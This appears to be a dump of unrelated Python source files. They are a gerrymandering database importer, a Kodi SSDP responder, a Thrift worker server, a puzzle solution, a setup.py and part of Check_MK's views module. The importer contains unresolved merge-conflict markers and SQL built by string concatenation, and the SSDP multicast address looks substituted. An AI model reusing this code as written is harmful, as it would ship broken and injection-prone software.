Districts = Base.classes.Districts
Population = Base.classes.Population
>>>>>>> build-2
def buildStateFPMap():
stateData = open("../parsedFiles/StateGeo.csv", 'r')
for line in stateData:
line = line.split(';')
if line[1] not in stateFPs.keys():
stateFPs[line[1]] = line[0]
stateData.close()
def importStateData():
# populate voting data
#
voteData = open("../parsedFiles/votingData.csv", 'r')
importedStatesYear = []
for line in voteData:
data = []
line = line.split(',')
for item in line:
if '\n' in item:
data.append(item[:-1])
else:
data.append(item)
if len(data) == 5:
# import data into database
sName = data[0]
year = data[1]
stateYear = sName+str(year)
if stateYear not in importedStatesYear:
# get StateFp
sId = stateFPs[sName]
# import State Data
ins = metadata.tables['States'].insert().values(StateId=sId, StateName=sName, Year=int(year), ClickCount=0)
conn.execute(ins)
importedStatesYear.append(sName+year)
voteData.close()
def importStateBoundaryData():
# import State Boundaries
stateData = open("../parsedFiles/StateGeo.csv", 'r')
for line in stateData:
<<<<<<< HEAD
boundaryPKId = []
=======
>>>>>>> build-2
line = line.split(';')
sId = int(line[0])
polygons = line[2:]
<<<<<<< HEAD
=======
for yr in range(2000,2020):
boundaryPKId = []
for polygon in polygons:
polygon = "PolygonFromText(\'POLYGON(" + polygon + ")\')"
ins = metadata.tables['Boundaries'].insert().values(Shape = text(polygon))
result = conn.execute(ins)
boundPKId = result.inserted_primary_key
# get pkId from last inserted for StateBoundary FK
boundaryPKId.append(boundPKId)
# find state by yea
s = " SELECT Id " \
+ " FROM gerrymandering.States" \
+ " WHERE States.Year = " + str(yr) \
+ " AND States.StateId = " + str(sId)
statePK = -1
for row in conn.execute(s):
statePK = row[0]
if statePK != -1:
# import StateBoundaries
for pkId in boundaryPKId:
ins = metadata.tables['StateBoundaries'].insert().values(BoundaryId = pkId[0], StateId = statePK)
conn.execute(ins)
stateData.close()
return
def importDistrictBoundary(path, year):
geoData = open(path, 'r')
for line in geoData:
boundaryPKId = []
line = line.split(';')
sId = int(line[0])
dId = int(line[1])
#area = int(line[2])
polygons = line[3:]
>>>>>>> build-2
for polygon in polygons:
polygon = "PolygonFromText(\'POLYGON(" + polygon + ")\')"
ins = metadata.tables['Boundaries'].insert().values(Shape=text(polygon))
result = conn.execute(ins)
boundPKId = result.inserted_primary_key
# get pkId from last inserted for StateBoundary FK
boundaryPKId.append(boundPKId)
<<<<<<< HEAD
# import StateBoundaries
for pkId in boundaryPKId:
ins = metadata.tables['StateBoundaries'].insert().values(BoundaryId=pkId[0], StateId=sId)
conn.execute(ins)
stateData.close()
=======
# import District Boundary
for yr in range(year, year+10):
dFK = -1
# find district by dId, year, sId
s = "SELECT "\
+ " Districts.Id " \
+ " FROM " \
+ " gerrymandering.Districts, gerrymandering.States " \
+ " WHERE " \
+ " Districts.StateId = States.Id and " \
+ " States.Year = " + str(yr) + " and States.StateId = " + str(sId) + " and Districts.DistrictId = " + str(dId)
for row in conn.execute(s):
dFK = row[0]
if dFK != -1:
for pkId in boundaryPKId:
ins = metadata.tables['DistrictBoundaries'].insert().values(BoundaryId=pkId[0], DistrictId=dFK)
conn.execute(ins)
# upd = " UPDATE "\
# + " gerrymandering.Districts SET Districts.Area = " + str(area) \
# + " WHERE Districts.Id = " + str(dFK)
#
# conn.execute(upd)
geoData.close()
return
>>>>>>> build-2
def importDistrictsAndVote(path):
# Districts
# `DistrictId`
# `Area`
# `clickCount`
# `StateId` FK
sName = -1
dId = -1
sFK = -1
districtData = open(path, 'r')
for line in districtData:
line = line.split(',')
sName = line[0]
year = line[1]
dId = line[2]
rVote = line[3]
dVote = line[4].replace('\n','')
if rVote == "Unopposed": # Check if a party was unopposed if it is make -1 a FLAG that will mean unoppsed
rVote = -1
dVote = 0
elif dVote == "Unopposed":
rVote = 0
dVote = -1
# get fk using sName
<<<<<<< HEAD
s = "SELECT Id FROM gerrymandering.States WHERE States.StateName = \'" + sName + "\' and States.Year = " + year
=======
s = "SELECT States.Id FROM gerrymandering.States WHERE States.StateName = \'" + sName + "\' and States.Year = " + year
>>>>>>> build-2
for row in conn.execute(s):
sFK = row[0]
ins = metadata.tables['Districts'].insert().values(DistrictId = dId, clickCount = 0, StateId=sFK)
result = conn.execute(ins)
districtPK = result.inserted_primary_key
# insert Vote data
ins = metadata.tables['Votes'].insert().values(DistrictId = districtPK[0], Party = "Republican", voteCount=rVote)
conn.execute(ins)
ins = metadata.tables['Votes'].insert().values(DistrictId=districtPK[0], Party="Democrat", voteCount=dVote)
conn.execute(ins)
<<<<<<< HEAD
def importPopulationData(year, sName, sFp, district):
=======
return
def importPopulationData(path, sName):
>>>>>>> build-2
# Population
# `Id`
# `Name` ENUM('Total', 'White', 'Black', 'Hispanic', 'Asian', 'PacificIslander', 'AmericanIndian', 'Other', 'Mixed')
# `Population`
# `DistrictId`
<<<<<<< HEAD
if year in range(2010, 2020): # range of the census data we have
if sName == 'Virginia':
vaCensus = open('../parsedFiles/VirginiaCensus.csv', 'r')
elif sName == 'North Carolina':
ncCensus = open('../parsedFiles/NorthCarolinaCensus.csv', 'r')
elif sName == 'New York':
nyCensus = open('../parsedFiles/nyCensus.csv', 'r')
ins = metadata.tables['Population'].insert().values(Name='', Population=-1, DistrictId=district)
result = conn.execute(ins)
def importVotingData(dId, party, vote):
ins = metadata.tables['Votes'].insert().values(DistrictId=dId, Party=party, voteCount=vote)
result = conn.execute(ins)
=======
censusData = open(path, 'r')
races = ('Total', 'White', 'Black', 'Hispanic', 'Asian', 'PacificIslander', 'AmericanIndian', 'Other', 'Mixed')
race = ''
pop = []
dId = -1
for line in censusData:
line = line.split(',')
race = line[0]
pop = line[1:]
if race == "Total population":
race = "Total"
elif race == "White":
race = "White"
elif race == "Asian":
race = "Asian"
elif race == "Black or African American":
race = "Black"
elif race == "American Indian and Alaska Native":
race = "AmericanIndian"
elif race == "Native Hawaiian and Other Pacific Islander":
race = "PacificIslander"
elif race == "Some other race":
race = "Other"
elif race == "Two or more races":
race = "Mixed"
elif race == "Hispanic or Latino (of any race)":
race = "Hispanic"
for year in range(2010, 2018):
dIds = []
# census data applies to the years 2010-2020, current year 2017
# find district with by district id, year, and name
s = "SELECT " \
+ "gerrymandering.Districts.Id " \
+ "FROM " \
+ "gerrymandering.Districts, gerrymandering.States " \
+ "WHERE " \
+ "States.Year = " + str(
year) + " and States.StateName = \'" + sName + "\' and Districts.StateId = States.Id"
for row in conn.execute(s):
dIds.append(row[0])
if len(dIds) != 0:
for i in range(len(pop)): # insert for the number of districts
ins = metadata.tables['Population'].insert().values(Name=race, Population=int(pop[i]),
DistrictId=dIds[i])
conn.execute(ins)
return
>>>>>>> build-2
def printTables():
for t in metadata.tables:
for x in engine.execute(metadata.tables[t].select()):
print(x)
return
if __name__ == "__main__":
main()
| 2.78125 | 3 |
resources/lib/tubecast/ssdp.py | pannal/script.tubecast | 0 | 12766388 | # -*- coding: utf-8 -*-
import contextlib
import operator
import socket
import struct
import threading
from resources.lib.kodi import kodilogging
from resources.lib.kodi.utils import get_setting_as_bool
from resources.lib.tubecast.kodicast import Kodicast
from resources.lib.tubecast.utils import build_template, str_to_bytes, PY3
if PY3:
from socketserver import DatagramRequestHandler, ThreadingUDPServer
else:
from SocketServer import DatagramRequestHandler, ThreadingUDPServer
logger = kodilogging.get_logger("ssdp")
def get_interface_address(if_name):
import fcntl # late import as this is only supported on Unix platforms.
sciocgifaddr = 0x8915
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
return fcntl.ioctl(s.fileno(), sciocgifaddr, struct.pack(b'256s', if_name[:15]))[20:24]
class ControlMixin(object):
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
def start(self):
self._thread = t = threading.Thread(name=type(self).__name__,
target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def stop(self):
self.shutdown()
self._thread.join()
self._thread = None
class MulticastServer(ControlMixin, ThreadingUDPServer):
allow_reuse_address = True
def __init__(self, addr, handler, chromecast_addr, poll_interval=0.5, bind_and_activate=True, interfaces=None):
ThreadingUDPServer.__init__(self, ('', addr[1]),
handler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self.chromecast_addr = chromecast_addr
self._multicast_address = addr
self._listen_interfaces = interfaces
self.set_loopback_mode(1) # localhost
self.set_ttl(2) # localhost and local network
self.handle_membership(socket.IP_ADD_MEMBERSHIP)
def set_loopback_mode(self, mode):
mode = struct.pack("b", operator.truth(mode))
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP,
mode)
def server_bind(self):
try:
if hasattr(socket, "SO_REUSEADDR"):
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except Exception as e:
logger.error(e)
try:
if hasattr(socket, "SO_REUSEPORT"):
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except Exception as e:
logger.error(e)
ThreadingUDPServer.server_bind(self)
def handle_membership(self, cmd):
if self._listen_interfaces is None:
mreq = struct.pack(
str("4sI"), socket.inet_aton(self._multicast_address[0]),
socket.INADDR_ANY)
self.socket.setsockopt(socket.IPPROTO_IP,
cmd, mreq)
else:
for interface in self._listen_interfaces:
try:
if_addr = socket.inet_aton(interface)
except socket.error:
if_addr = get_interface_address(interface)
mreq = socket.inet_aton(self._multicast_address[0]) + if_addr
self.socket.setsockopt(socket.IPPROTO_IP,
cmd, mreq)
def set_ttl(self, ttl):
ttl = struct.pack("B", ttl)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
def server_close(self):
self.handle_membership(socket.IP_DROP_MEMBERSHIP)
class SSDPHandler(DatagramRequestHandler):
header = '''\
HTTP/1.1 200 OK\r
LOCATION: http://{{ ip }}:{{ port }}/ssdp/device-desc.xml\r
CACHE-CONTROL: max-age=1800\r
EXT: \r
SERVER: UPnP/1.0\r
BOOTID.UPNP.ORG: 1\r
USN: uuid:{{ uuid }}\r
ST: urn:dial-multiscreen-org:service:dial:1\r
\r
'''
def handle(self):
data = self.request[0].strip()
self.datagram_received(data, self.client_address)
def reply(self, data, address):
socket = self.request[1]
socket.sendto(str_to_bytes(data), address)
@staticmethod
def get_remote_ip(address):
# Create a socket to determine what address the client should use
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(address)
iface = s.getsockname()[0]
return iface if PY3 else unicode(iface)
def datagram_received(self, datagram, address):
if get_setting_as_bool('debug-ssdp'):
logger.debug('Datagram received. Address:{}; Content:{}'.format(address, datagram))
if b"urn:dial-multiscreen-org:service:dial:1" in datagram and b"M-SEARCH" in datagram:
if get_setting_as_bool('debug-ssdp'):
logger.debug("Answering datagram")
_, port = self.server.chromecast_addr
data = build_template(self.header).render(
ip=self.get_remote_ip(address),
port=port,
uuid=Kodicast.uuid
)
self.reply(data, address)
class SSDPserver(object):
SSDP_ADDR = '172.16.17.32'
SSDP_PORT = 1900
def start(self, chromecast_addr, interfaces=None):
logger.info('Starting SSDP server')
self.server = MulticastServer((self.SSDP_ADDR, self.SSDP_PORT), SSDPHandler,
chromecast_addr=chromecast_addr,
interfaces=interfaces)
self.server.start()
def shutdown(self):
logger.info('Stopping SSDP server')
self.server.server_close()
self.server.stop()
| 1.953125 | 2 |
tanit/worker/server/server.py | yassineazzouz/kraken | 1 | 12766389 | import logging as lg
from threading import Thread
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
from ...thrift.worker.service import WorkerService
from .handler import WorkerServiceHandler
from .worker import Worker
from ...common.config.configuration import TanitConfiguration
from ...common.config.configuration_keys import Keys
_logger = lg.getLogger(__name__)
class WorkerServer(object):
def __init__(self):
configuration = TanitConfiguration.getInstance()
self.bind_address = configuration.get(Keys.WORKER_RPC_BIND_HOST)
self.bind_port = configuration.get(Keys.WORKER_RPC_PORT)
self.worker = Worker()
self.stopped = False
def stop(self):
self.stopped = True
def _run(self):
# Create Service handler
handler = WorkerServiceHandler(self.worker)
server = TServer.TThreadedServer(
WorkerService.Processor(handler),
TSocket.TServerSocket(self.bind_address, self.bind_port),
TTransport.TBufferedTransportFactory(),
TBinaryProtocol.TBinaryProtocolFactory(),
daemon=True,
)
# Start Tanit server
server.serve()
def start(self):
self.stopped = False
_logger.info("Stating Tanit worker server.")
self.daemon = Thread(target=self._run, args=())
self.daemon.setDaemon(True)
self.daemon.start()
_logger.info(
"Tanit worker server started, listening at %s:%s",
self.bind_address,
self.bind_port,
)
# Start worker services
try:
self.worker.start()
except Exception:
_logger.exception("Failed to start Tanit worker services.")
exit(1)
try:
while self.daemon.is_alive():
# Try to join the child thread back to parent for 0.5 seconds
self.daemon.join(0.5)
if self.stopped:
_logger.info("Tanit worker server stopped, exiting.")
break
except (KeyboardInterrupt, SystemExit):
_logger.info("Received KeyboardInterrupt Signal.")
except Exception as e:
_logger.exception("Fatal server exception : %s, exiting", e)
finally:
_logger.info("Stopping Tanit worker server.")
self.worker.stop()
_logger.info("Tanit worker server stopped.")
| 1.960938 | 2 |
2016/Day 19 - Python/presentThiefPt2.py | AndreasDL/AdventOfCode | 0 | 12766390 | import sys
NO_ELVES = 3005290
#1->3 0->2
#2->5 1->4
#4->1 3->0
#2->4 1->3
#2 1 wins
elfAtPosition = [ i for i in range(NO_ELVES)]
#init
currIndex = 0
while len(elfAtPosition) > 1:
nextIndex = int(currIndex + len(elfAtPosition)/2) % len(elfAtPosition)
currElf = elfAtPosition[currIndex]
nextElf = elfAtPosition[nextIndex]
#print(currElf, " steals from ", nextElf)
del elfAtPosition[nextIndex]
if len(elfAtPosition) % 1000 == 0:
print("pickpockets left: ", len(elfAtPosition))
if currElf < nextElf:
currIndex += 1
currIndex %= len(elfAtPosition)
print(elfAtPosition) #this position is zero indexed! +1 | 2.9375 | 3 |
setup.py | gismaps/PDF_Utils | 0 | 12766391 | '''
Build script for package's wheel and zip files.
Look in the `dist` folder for the output.
Usage:
Run as follows:
>python setup.py sdist --formats=zip bdist_wheel
'''
from pathlib import Path
import json
import os
import setuptools
import shutil
import sys
from platform import python_revision
def cleanup(name: str):
'''
Clean up extraneous files from the build process.
Args:
name (str): The top-level package name.
'''
shutil.rmtree('./build', ignore_errors=True)
shutil.rmtree('./src/{}.egg-info'.format(name), ignore_errors=True)
package_dict = {'name': '', '__version__': '', '__author__': ''}
init_path = Path("src") / 'pdf_utils' / '__init__.py'
print('Retrieved the following settings from __init__.py')
with open(init_path) as init:
for line in init:
for key in package_dict:
if line.startswith(f'{key} = '):
package_dict[key] = line.split('=')[1].strip().strip("\"'")
print(f' >> {key}: {package_dict[key]}')
cleanup(package_dict['name']) # remove previous build cruft
with open('README.md') as fh:
long_description = fh.read()
dependencies = setuptools.find_packages('src')
print('Package dependencies: {}'.format(dependencies))
with open('requirements.txt') as fh:
requirements = fh.read().splitlines()
print('Package requirements: {}'.format(requirements))
setuptools.setup(
name = package_dict['name'],
version = package_dict['__version__'],
author = package_dict['__author__'],
description = 'PDF utility classes',
long_description = long_description,
long_description_content_type = 'text/markdown',
url = 'https://github.com/gismaps/PDF_Utils',
packages = dependencies,
install_requires = requirements,
package_dir = {'': 'src'},
data_files = [], # [('license', ['LICENSE.txt'])], # done via MANIFEST.in
include_package_data = True,
license = "MIT",
classifiers = [
'Development Status :: 4 - Beta',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
python_requires = '>=3.6',
)
cleanup(package_dict['name']) # remove build cruft
print('setup.py ended normally')
| 2.21875 | 2 |
omd/versions/1.2.8p15.cre/share/check_mk/web/htdocs/views.py | NCAR/spol-nagios | 0 | 12766392 | #!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2014 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import config, defaults, livestatus, time, os, re, pprint
import weblib, traceback, forms, valuespec, inventory, visuals, metrics
import bi
from lib import *
# Datastructures and functions needed before plugins can be loaded
loaded_with_language = False
# Load all view plugins
def load_plugins(force):
global loaded_with_language
if loaded_with_language == current_language and not force:
# always reload the hosttag painters, because new hosttags might have been
# added during runtime
load_host_tag_painters()
return
global multisite_datasources ; multisite_datasources = {}
global multisite_layouts ; multisite_layouts = {}
global multisite_painters ; multisite_painters = {}
global multisite_sorters ; multisite_sorters = {}
global multisite_builtin_views ; multisite_builtin_views = {}
global multisite_painter_options ; multisite_painter_options = {}
global multisite_commands ; multisite_commands = []
global view_hooks ; view_hooks = {}
global inventory_displayhints ; inventory_displayhints = {}
config.declare_permission_section("action", _("Commands on host and services"), do_sort = True)
load_web_plugins("views", globals())
load_host_tag_painters()
# This must be set after plugin loading to make broken plugins raise
# exceptions all the time and not only the first time (when the plugins
# are loaded).
loaded_with_language = current_language
# Declare permissions for builtin views
config.declare_permission_section("view", _("Multisite Views"), do_sort = True)
for name, view in multisite_builtin_views.items():
config.declare_permission("view.%s" % name,
_u(view["title"]),
_u(view["description"]),
config.builtin_role_ids)
# Make sure that custom views also have permissions
config.declare_dynamic_permissions(lambda: visuals.declare_custom_permissions('views'))
# Add painter names to painter objects (e.g. for JSON web service)
for n, p in multisite_painters.items():
p["name"] = n
# Load all views - users or builtins
def load_views():
global multisite_views, available_views
# Skip views which do not belong to known datasources
multisite_views = visuals.load('views', multisite_builtin_views,
skip_func = lambda v: v['datasource'] not in multisite_datasources)
available_views = visuals.available('views', multisite_views)
transform_old_views()
def permitted_views():
try:
return available_views
except:
# In some cases, for example when handling AJAX calls the views might
# have not been loaded yet
load_views()
return available_views
def all_views():
return multisite_views
# Convert views that are saved in the pre 1.2.6-style
# FIXME: Can be removed one day. Mark as incompatible change or similar.
def transform_old_views():
for view in multisite_views.values():
ds_name = view['datasource']
datasource = multisite_datasources[ds_name]
if "context" not in view: # legacy views did not have this explicitly
view.setdefault("user_sortable", True)
if 'context_type' in view:
# This code transforms views from user_views.mk which have been migrated with
# daily snapshots from 2014-08 till beginning 2014-10.
visuals.transform_old_visual(view)
elif 'single_infos' not in view:
# This tries to map the datasource and additional settings of the
# views to get the correct view context
#
# This code transforms views from views.mk (legacy format) to the current format
try:
hide_filters = view.get('hide_filters')
if 'service' in hide_filters and 'host' in hide_filters:
view['single_infos'] = ['service', 'host']
elif 'service' in hide_filters and 'host' not in hide_filters:
view['single_infos'] = ['service']
elif 'host' in hide_filters:
view['single_infos'] = ['host']
elif 'hostgroup' in hide_filters:
view['single_infos'] = ['hostgroup']
elif 'servicegroup' in hide_filters:
view['single_infos'] = ['servicegroup']
elif 'aggr_service' in hide_filters:
view['single_infos'] = ['service']
elif 'aggr_name' in hide_filters:
view['single_infos'] = ['aggr']
elif 'aggr_group' in hide_filters:
view['single_infos'] = ['aggr_group']
elif 'log_contact_name' in hide_filters:
view['single_infos'] = ['contact']
elif 'event_host' in hide_filters:
view['single_infos'] = ['host']
elif hide_filters == ['event_id', 'history_line']:
view['single_infos'] = ['history']
elif 'event_id' in hide_filters:
view['single_infos'] = ['event']
elif 'aggr_hosts' in hide_filters:
view['single_infos'] = ['host']
else:
# For all other context types assume the view is showing multiple objects
# and the datasource can simply be gathered from the datasource
view['single_infos'] = []
except: # Exceptions can happen for views saved with certain GIT versions
if config.debug:
raise
# Convert from show_filters, hide_filters, hard_filters and hard_filtervars
# to context construct
if 'context' not in view:
view['show_filters'] = view['hide_filters'] + view['hard_filters'] + view['show_filters']
single_keys = visuals.get_single_info_keys(view)
# First get vars for the classic filters
context = {}
filtervars = dict(view['hard_filtervars'])
all_vars = {}
for filter_name in view['show_filters']:
if filter_name in single_keys:
continue # skip conflictings vars / filters
context.setdefault(filter_name, {})
try:
f = visuals.get_filter(filter_name)
except:
# The exact match filters have been removed. They where used only as
# link filters anyway - at least by the builtin views.
continue
for var in f.htmlvars:
# Check whether or not the filter is supported by the datasource,
# then either skip or use the filter vars
if var in filtervars and f.info in datasource['infos']:
value = filtervars[var]
all_vars[var] = value
context[filter_name][var] = value
# We changed different filters since the visuals-rewrite. This must be treated here, since
# we need to transform views which have been created with the old filter var names.
# Changes which have been made so far:
changed_filter_vars = {
'serviceregex': { # Name of the filter
# old var name: new var name
'service': 'service_regex',
},
'hostregex': {
'host': 'host_regex',
},
'hostgroupnameregex': {
'hostgroup_name': 'hostgroup_regex',
},
'servicegroupnameregex': {
'servicegroup_name': 'servicegroup_regex',
},
'opthostgroup': {
'opthostgroup': 'opthost_group',
'neg_opthostgroup': 'neg_opthost_group',
},
'optservicegroup': {
'optservicegroup': 'optservice_group',
'neg_optservicegroup': 'neg_optservice_group',
},
'hostgroup': {
'hostgroup': 'host_group',
'neg_hostgroup': 'neg_host_group',
},
'servicegroup': {
'servicegroup': 'service_group',
'neg_servicegroup': 'neg_service_group',
},
'host_contactgroup': {
'host_contactgroup': 'host_contact_group',
'neg_host_contactgroup': 'neg_host_contact_group',
},
'service_contactgroup': {
'service_contactgroup': 'service_contact_group',
'neg_service_contactgroup': 'neg_service_contact_group',
},
}
if filter_name in changed_filter_vars and f.info in datasource['infos']:
for old_var, new_var in changed_filter_vars[filter_name].items():
if old_var in filtervars:
value = filtervars[old_var]
all_vars[new_var] = value
context[filter_name][new_var] = value
# Now, when there are single object infos specified, add these keys to the
# context
for single_key in single_keys:
if single_key in all_vars:
context[single_key] = all_vars[single_key]
view['context'] = context
# Cleanup unused attributes
for k in [ 'hide_filters', 'hard_filters', 'show_filters', 'hard_filtervars' ]:
try:
del view[k]
except KeyError:
pass
def save_views(us):
visuals.save('views', multisite_views)
#.
# .--Table of views------------------------------------------------------.
# | _____ _ _ __ _ |
# | |_ _|_ _| |__ | | ___ ___ / _| __ _(_) _____ _____ |
# | | |/ _` | '_ \| |/ _ \ / _ \| |_ \ \ / / |/ _ \ \ /\ / / __| |
# | | | (_| | |_) | | __/ | (_) | _| \ V /| | __/\ V V /\__ \ |
# | |_|\__,_|_.__/|_|\___| \___/|_| \_/ |_|\___| \_/\_/ |___/ |
# | |
# +----------------------------------------------------------------------+
# | Show list of all views with buttons for editing |
# '----------------------------------------------------------------------'
def page_edit_views():
load_views()
cols = [ (_('Datasource'), lambda v: multisite_datasources[v["datasource"]]['title']) ]
visuals.page_list('views', _("Edit Views"), multisite_views, cols)
#.
# .--Create View---------------------------------------------------------.
# | ____ _ __ ___ |
# | / ___|_ __ ___ __ _| |_ ___ \ \ / (_) _____ __ |
# | | | | '__/ _ \/ _` | __/ _ \ \ \ / /| |/ _ \ \ /\ / / |
# | | |___| | | __/ (_| | || __/ \ V / | | __/\ V V / |
# | \____|_| \___|\__,_|\__\___| \_/ |_|\___| \_/\_/ |
# | |
# +----------------------------------------------------------------------+
# | Select the view type of the new view |
# '----------------------------------------------------------------------'
# First step: Select the data source
# Create datasource selection valuespec, also for other modules
# FIXME: Sort the datasources by (assumed) common usage
def DatasourceSelection():
# FIXME: Sort the datasources by (assumed) common usage
datasources = []
for ds_name, ds in multisite_datasources.items():
datasources.append((ds_name, ds['title']))
return DropdownChoice(
title = _('Datasource'),
help = _('The datasources define which type of objects should be displayed with this view.'),
choices = datasources,
sorted = True,
columns = 1,
default_value = 'services',
)
def page_create_view(next_url = None):
vs_ds = DatasourceSelection()
ds = 'services' # Default selection
html.header(_('Create View'), stylesheets=["pages"])
html.begin_context_buttons()
back_url = html.var("back", "")
html.context_button(_("Back"), back_url or "edit_views.py", "back")
html.end_context_buttons()
if html.var('save') and html.check_transaction():
try:
ds = vs_ds.from_html_vars('ds')
vs_ds.validate_value(ds, 'ds')
if not next_url:
next_url = html.makeuri([('datasource', ds)], filename = "create_view_infos.py")
else:
next_url = next_url + '&datasource=%s' % ds
html.http_redirect(next_url)
return
except MKUserError, e:
html.write("<div class=error>%s</div>\n" % e)
html.add_user_error(e.varname, e)
html.begin_form('create_view')
html.hidden_field('mode', 'create')
forms.header(_('Select Datasource'))
forms.section(vs_ds.title())
vs_ds.render_input('ds', ds)
html.help(vs_ds.help())
forms.end()
html.button('save', _('Continue'), 'submit')
html.hidden_fields()
html.end_form()
html.footer()
def page_create_view_infos():
ds_name = html.var('datasource')
if ds_name not in multisite_datasources:
raise MKGeneralException(_('The given datasource is not supported'))
visuals.page_create_visual('views', multisite_datasources[ds_name]['infos'],
next_url = 'edit_view.py?mode=create&datasource=%s&single_infos=%%s' % ds_name)
#.
# .--Edit View-----------------------------------------------------------.
# | _____ _ _ _ __ ___ |
# | | ____|__| (_) |_ \ \ / (_) _____ __ |
# | | _| / _` | | __| \ \ / /| |/ _ \ \ /\ / / |
# | | |__| (_| | | |_ \ V / | | __/\ V V / |
# | |_____\__,_|_|\__| \_/ |_|\___| \_/\_/ |
# | |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
# Return list of available datasources (used to render filters)
def get_view_infos(view):
ds_name = view.get('datasource', html.var('datasource'))
return multisite_datasources[ds_name]['infos']
def page_edit_view():
load_views()
visuals.page_edit_visual('views', multisite_views,
custom_field_handler = render_view_config,
load_handler = transform_view_to_valuespec_value,
create_handler = create_view_from_valuespec,
info_handler = get_view_infos,
try_handler = lambda view: show_view(view, False, False)
)
def view_choices(only_with_hidden = False):
choices = [("", "")]
for name, view in available_views.items():
if not only_with_hidden or view['single_infos']:
if view.get('mobile', False):
title = _('Mobile: ') + _u(view["title"])
else:
title = _u(view["title"])
choices.append(("%s" % name, title))
return choices
def view_editor_options():
return [
('mobile', _('Show this view in the Mobile GUI')),
('mustsearch', _('Show data only on search')),
('force_checkboxes', _('Always show the checkboxes')),
('user_sortable', _('Make view sortable by user')),
('play_sounds', _('Play alarm sounds')),
]
def view_editor_specs(ds_name, general_properties=True):
load_views() # make sure that available_views is present
specs = []
if general_properties:
specs.append(
('view', Dictionary(
title = _('View Properties'),
render = 'form',
optional_keys = None,
elements = [
('datasource', FixedValue(ds_name,
title = _('Datasource'),
totext = multisite_datasources[ds_name]['title'],
help = _('The datasource of a view cannot be changed.'),
)),
('options', ListChoice(
title = _('Options'),
choices = view_editor_options(),
default_value = ['user_sortable'],
)),
('browser_reload', Integer(
title = _('Automatic page reload'),
unit = _('seconds'),
minvalue = 0,
help = _('Leave this empty or at 0 for no automatic reload.'),
)),
('layout', DropdownChoice(
title = _('Basic Layout'),
choices = [ (k, v["title"]) for k,v in multisite_layouts.items() if not v.get("hide")],
default_value = 'table',
sorted = True,
)),
('num_columns', Integer(
title = _('Number of Columns'),
default_value = 1,
minvalue = 1,
maxvalue = 50,
)),
('column_headers', DropdownChoice(
title = _('Column Headers'),
choices = [
("off", _("off")),
("pergroup", _("once per group")),
("repeat", _("repeat every 20'th row")),
],
default_value = 'pergroup',
)),
],
))
)
allowed = allowed_for_datasource(multisite_sorters, ds_name)
def column_spec(ident, title, ds_name):
allowed = allowed_for_datasource(multisite_painters, ds_name)
collist = collist_of_collection(allowed)
allow_empty = True
empty_text = None
if ident == 'columns':
allow_empty = False
empty_text = _("Please add at least one column to your view.")
vs_column = Tuple(
title = _('Column'),
elements = [
DropdownChoice(
title = _('Column'),
choices = collist,
sorted = True,
no_preselect = True,
),
DropdownChoice(
title = _('Link'),
choices = view_choices,
sorted = True,
),
DropdownChoice(
title = _('Tooltip'),
choices = [(None, "")] + collist,
),
]
)
joined = allowed_for_joined_datasource(multisite_painters, ds_name)
if ident == 'columns' and joined:
joined_cols = collist_of_collection(joined, collist)
vs_column = Alternative(
elements = [
vs_column,
Tuple(
title = _('Joined column'),
elements = [
DropdownChoice(
title = _('Column'),
choices = joined_cols,
sorted = True,
no_preselect = True,
),
TextUnicode(
title = _('of Service'),
allow_empty = False,
),
DropdownChoice(
title = _('Link'),
choices = view_choices,
sorted = True,
),
DropdownChoice(
title = _('Tooltip'),
choices = [(None, "")] + joined_cols,
),
TextUnicode(
title = _('Title'),
),
],
),
],
style = 'dropdown',
match = lambda x: x != None and len(x) == 5 and 1 or 0,
)
return (ident, Dictionary(
title = title,
render = 'form',
optional_keys = None,
elements = [
(ident, ListOf(vs_column,
title = title,
add_label = _('Add column'),
allow_empty = allow_empty,
empty_text = empty_text,
)),
],
))
specs.append(column_spec('columns', _('Columns'), ds_name))
specs.append(
('sorting', Dictionary(
title = _('Sorting'),
render = 'form',
optional_keys = None,
elements = [
('sorters', ListOf(
Tuple(
elements = [
DropdownChoice(
title = _('Column'),
choices = [ (name, p["title"]) for name, p in allowed.items() ],
sorted = True,
no_preselect = True,
),
DropdownChoice(
title = _('Order'),
choices = [(False, _("Ascending")),
(True, _("Descending"))],
),
],
orientation = 'horizontal',
),
title = _('Sorting'),
add_label = _('Add column'),
)),
],
)),
)
specs.append(column_spec('grouping', _('Grouping'), ds_name))
return specs
def render_view_config(view, general_properties=True):
ds_name = view.get("datasource", html.var("datasource"))
if not ds_name:
raise MKInternalError(_("No datasource defined."))
if ds_name not in multisite_datasources:
raise MKInternalError(_('The given datasource is not supported.'))
view['datasource'] = ds_name
